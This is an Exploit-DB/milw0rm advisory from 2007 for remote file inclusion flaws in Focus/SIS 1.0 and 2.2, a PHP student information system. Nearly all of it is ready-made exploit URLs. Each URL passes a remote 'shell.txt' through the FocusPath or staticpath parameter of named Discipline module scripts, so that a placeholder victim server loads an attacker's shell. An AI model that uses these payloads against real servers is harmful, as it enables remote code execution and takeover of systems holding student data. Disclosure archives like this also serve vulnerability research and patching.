Focus/SIS <= 1.0/2.2 - Remote File Inclusion Vulnerabilities

2007-09-08T00:00:00
ID EDB-ID:4377
Type exploitdb
Reporter ThE TiGeR
Modified 2007-09-08T00:00:00

Description

Focus/SIS <= 1.0/2.2 Remote File Inclusion Vulnerabilities. CVE-2007-4806,CVE-2007-4807,CVE-2007-4942. Webapps exploit for php platform

                                        
                                            #Focus/SIS =&gt;1.0&2.2 Remote file inclusion

#Download v1.0 : http://unix.freshmeat.net/redir/focus_sis/64492/url_zip/Focus_v1.0.zip

#         v2.2 : http://www.focus-sis.org/download.php?modfunc=file&version=2.2
============================================================================================================
#Exploit V1.0 :

#http://victime.com/Focus_v1.0_path/modules/Discipline/CategoryBreakdownTime.php?FocusPath= shell.txt?
============================================================================================================
#Exploit v 2.2 :

#http://victime.com/Focus_v2.2_path/modules/Discipline/CategoryBreakdownTime.php?staticpath= shell.txt?

#http://victime.com/Focus_v2.2_path/modules/Discipline/StudentFieldBreakdown.php?staticpath=shell.txt?

#Greetz & Thx : Str0ke

#Discovered by ThE TiGeR 

# milw0rm.com [2007-09-08]